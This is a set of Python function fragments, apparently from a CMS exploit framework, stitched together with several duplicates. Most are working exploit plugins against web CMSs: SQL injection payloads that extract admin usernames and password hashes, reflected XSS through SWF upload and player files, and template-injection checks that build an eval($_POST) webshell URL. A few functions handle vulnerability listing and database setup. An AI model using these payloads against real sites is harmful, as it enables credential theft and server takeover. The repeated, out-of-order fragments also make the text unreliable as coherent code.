def verify(URL): r=requests.get(URL) r.close() if "Request" in r.content: logger.success("Step 1: Exploitable!") else: logger.error("Step 1: It's not exploitable!")
def exploit(URL): url = URL + "/faq.php?action=grouppermission" if verify(url): manager_hash = get_hash(url) logger.success("Username: %s" % manager_hash["username"]) logger.success("Hash: %s" % manager_hash["md5"]) return "%s: %s|%s" % (URL, manager_hash["username"], manager_hash["md5"])
def do_vulns(self, arg): """ 漏洞信息 :param arg: string, 参数 :return: """ arg = arg.split() if not arg: vulns = self.show_vulns() print "\nVulns\n=====\n" print "%-40s%s" % ("Plugin", "Vuln") print "%-40s%s" % ("------", "----") for plugin, vuln in vulns: print "%-40s%s" % (plugin, vuln) print elif arg[0] == "-d": self.clear_vulns() logger.success("Clear database successfully.") elif arg[0] == "-o": plugin_name = arg[1] vulns = self.show_vulns() with open("vulns.txt", "a") as f: f.write(os.linesep) f.write("[%s]" % plugin_name + os.linesep) for i in vulns: if i[0] == plugin_name: f.write(i[1]+os.linesep) f.write(os.linesep) logger.success("Save vulns successfully.")
def exploit(URL, Thread): logger.process("Request " + URL) r = requests.get(URL) r.close() if r.status_code == 200: logger.success("200") return "200"
def do_vulns(self, arg): """ 漏洞信息 :param arg: string, 参数 :return: """ arg = arg.split() if not arg: vulns = self.show_vulns() print "\nVulns\n=====\n" print "%-40s%s" % ("Plugin", "Vuln") print "%-40s%s" % ("------", "----") for plugin, vuln in vulns: print "%-40s%s" % (plugin, vuln) print elif arg[0] == "-d": self.clear_vulns() logger.success("Clear database successfully.") elif arg[0] == "-o": plugin_name = arg[1] vulns = self.show_vulns() with open("vulns.txt", "a") as f: f.write(os.linesep) f.write("[%s]" % plugin_name + os.linesep) for i in vulns: if i[0] == plugin_name: f.write(i[1] + os.linesep) f.write(os.linesep) logger.success("Save vulns successfully.")
def exploit(URL, Thread): logger.process("Request "+URL) r = requests.get(URL) r.close() if r.status_code == 200: logger.success("200") return "200"
def log(self, request, result): """ 线程池的 callback :return: """ if result: self.result = "%s: %s" % (self.url, result) logger.success(self.result) raise threadpool.NoResultsPending
def do_rebuild_db(self, line): """ 重建数据库 :return: """ logger.process("Clear current database") logger.process("Rebuild database") self.db_rebuild() logger.success("OK")
def exploit(URL): logger.process("Requesting target site") try: result=verify(URL) logger.success("Username: %s" % result[0]) logger.success("password: %s" % result[1]) return "%s: %s|%s" % (URL, result[0], result[1]) except: pass
def exploit(URL): url = URL + "/static/image/common/flvplayer.swf?file=1.flv&" \ "linkfromdisplay=true&link=javascript:alert(1);" logger.process("Requesting target site") r = requests.get(url, timeout=5) r.close() if hashlib.md5(r.content).hexdigest() == "7d675405ff7c94fa899784b7ccae68d3": logger.success("Exploitable!") logger.success(url) return url
def start(self): """Start the scan.""" status("Starting directory scan") self.intresting_urls = self._dirscan() if self.intresting_urls is not 0: success("found %d urls to take a look at..." % (len(self.intresting_urls))) for urldic in self.intresting_urls: for key in urldic: verbose(self, "[%d] %s" % (urldic[key], key)) self._xss_scan()
def get_hash(url): r=requests.get(url) r.close() try: result=re.search(r"Duplicate entry \'(.*?)' for key", r.content).group(1) username=result.split("|")[1] password=result.split("|")[2] logger.success("Step 2:") return (username,password) except: logger.error("Step 2: Finish! It's not exploitable!\nIf step 1 is exploitable,you can try it by hand!\n")
def exploit(URL): url=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a" logger.process("Requesting target site") verify(URL) try: result=get_hash(url) logger.success("Username: %s" % result[0]) logger.success("password: %s" % result[1]) return "%s: %s|%s" % (URL, result[0], result[1]) except: pass
def exploit(URL): url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \ "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \ "rt%281%29;//" logger.process("Requesting target site") r = requests.get(url, timeout=5) r.close() if hashlib.md5(r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12": logger.success("Exploitable!") logger.success(url) return url
def exploit(URL): url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \ "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \ "rt%281%29;//" logger.process("Requesting target site") r = requests.get(url, timeout=5) r.close() if hashlib.md5( r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12": logger.success("Exploitable!") logger.success(url) return url
def do_values(self, arg): arg = arg.split() if not arg: vulns = self.show_vulns() print "\nVulns\n=====\n" print "%-42s%s" % ("标题", "漏洞") print "%-40s%s" % ("------", "----") for plugin, vuln in vulns: print "%-40s%s" % (plugin, vuln) print elif arg[0] == "-d": self.clear_vulns() logger.success("Clear database successfully.")
def verify(URL): r=requests.get(URL+"/plus/search.php?keyword=as&typeArr[%20uNion%20]=a") r.close() if "Request Error step 1" in r.content: logger.success("Step 1: Exploitable!") result=get_hash(URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a") return result elif "Request Error step 2" in r.content: logger.success("Step 2: Exploitable!") result=get_hash(URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a") return result else: logger.error("It's not exploitable!")
def init(self): try: self.cu.execute("DROP TABLE info;") self.cu.execute("DROP TABLE sniff") self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);") self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);") logger.success("初始化成功") except: logger.error("初始化错误") logger.info("从新建立数据库") self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);") self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);") logger.success("建立成功")
def exploit(URL): url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \ r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \ r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \ r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \ r"\\x69\\x70\\x74\\x3e" logger.process("Requesting target site") r = requests.get(url, timeout=5) r.close() if "</title><script>alert(document.domain)</script>" in r.text: logger.success("Exploitable!") logger.success(url) return url
def do_update(self, line): """ 更新 :return: """ logger.process("") logger.process("Attempting to update the CMS Exploit Framework") logger.process("") logger.process("Downloading plugin list") remote_plugins = self.down_plugin_list() logger.process("Getting local plugin list") local_plugins = self.get_local_plugin_list() logger.process("Comparing and updating") new_plugins = self.down_plugins(remote_plugins, local_plugins) logger.success("New plugins: %s" % str(new_plugins)) self.do_rebuild_db("")
def verify(url): """ 判断是否存在注入 :param url: 网站地址 :return: bool """ logger.process("Requesting target site") r = requests.post(url, data={ "gids[99]": "'", "gids[100][0]": ") and (select 1 from (select count(*" "),concat(version(),floor(rand(0)*2))" "x from information_schema.tables gro" "up by x)a)#" }, timeout=5) r.close() if "MySQL Query Error" in r.text: logger.success("Exploitable!") return True
def verify(url): """ 判断是否存在注入 :param url: 网站地址 :return: bool """ logger.process("Requesting target site") r = requests.post( url, data={ "gids[99]": "'", "gids[100][0]": ") and (select 1 from (select count(*" "),concat(version(),floor(rand(0)*2))" "x from information_schema.tables gro" "up by x)a)#", }, timeout=5, ) r.close() if "MySQL Query Error" in r.text: logger.success("Exploitable!") return True
def exploit(URL): url = URL + "/index.php/Index/index/name/${@phpinfo()}" logger.process("Requesting target site") r = requests.get(url, timeout=5) r.close() if "<title>phpinfo()</title>" in r.text: logger.success("Exploitable!") logger.success("Phpinfo: %s" % url) url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))") logger.success("Webshell: %s" % url) return url
def exploit(URL): url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \ "(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \ "e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \ "- &sitesearch=http://127.0.0.1/startbbs/" logger.process("Requesting target site") r = requests.get(url, timeout=5) r.close() if "chuishere" in r.text: logger.success("Exploitable!") username, md5 = r.text.split("~~~")[1].split("~") logger.success("Username: %s" % username) logger.success("Hash: %s" % md5) return "%s: %s|%s" % (URL, username, md5)
def exploit(URL, Cookie): logger.process("Requesting " + URL) url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \ "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \ "36f6d65636875)%20from%20et_users%20limit%201,1%23" r = requests.get(url=url, cookies=Cookie, timeout=5) r.close() if "handsomechu" in r.text: logger.success("Exploitable!") handsomechu = r.text.split("handsomechu")[1].split("~~~") username, password = handsomechu logger.success("Username: %s" % username) logger.success("Hash: %s" % password) return "%s: %s|%s" % (URL, username, password)
def exploit(URL, Cookie): logger.process("Requesting " + URL) url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \ "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \ "password,0x68616e64736f6d65636875),5%20from%20et_users%23" r = requests.get(url=url, cookies=Cookie, timeout=5) r.close() if "handsomechu" in r.text: logger.success("Exploitable!") handsomechu = r.text.split("handsomechu")[1].split("~~~") username, password = handsomechu logger.success("Username: %s" % username) logger.success("Hash: %s" % password) return "%s: %s|%s" % (URL, username, password)
def exploit(URL): urls = [ URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D", URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D", ] for i, url in zip(range(1, 3), urls): logger.process("Testing URL %d..." % i) r = requests.get(url, timeout=5) r.close() if "<title>phpinfo()</title>" in r.text: logger.success("Exploitable!") logger.success("Phpinfo: %s" % url) url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D") logger.success("WebShell: %s" % url) return url
def exploit(URL): urls = [ URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D", URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D" ] for i, url in zip(range(1, 3), urls): logger.process("Testing URL %d..." % i) r = requests.get(url, timeout=5) r.close() if "<title>phpinfo()</title>" in r.text: logger.success("Exploitable!") logger.success("Phpinfo: %s" % url) url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D") logger.success("WebShell: %s" % url) return url
def exploit(URL, Cookie): logger.process("Requesting "+URL) url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \ "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \ "36f6d65636875)%20from%20et_users%20limit%201,1%23" r = requests.get( url=url, cookies=Cookie, timeout=5 ) r.close() if "handsomechu" in r.text: logger.success("Exploitable!") handsomechu = r.text.split("handsomechu")[1].split("~~~") username, password = handsomechu logger.success("Username: %s" % username) logger.success("Hash: %s" % password) return "%s: %s|%s" % (URL, username, password)
def exploit(URL, Cookie): logger.process("Requesting "+URL) url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \ "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \ "password,0x68616e64736f6d65636875),5%20from%20et_users%23" r = requests.get( url=url, cookies=Cookie, timeout=5 ) r.close() if "handsomechu" in r.text: logger.success("Exploitable!") handsomechu = r.text.split("handsomechu")[1].split("~~~") username, password = handsomechu logger.success("Username: %s" % username) logger.success("Hash: %s" % password) return "%s: %s|%s" % (URL, username, password)
def do_init_db(self, line): logger.process("初始化数据库") self.db_init() logger.success("OK")
def do_rebuild_db(self, line): logger.process("清空数据库") logger.process("重建数据库") self.db_rebuild() logger.success("OK")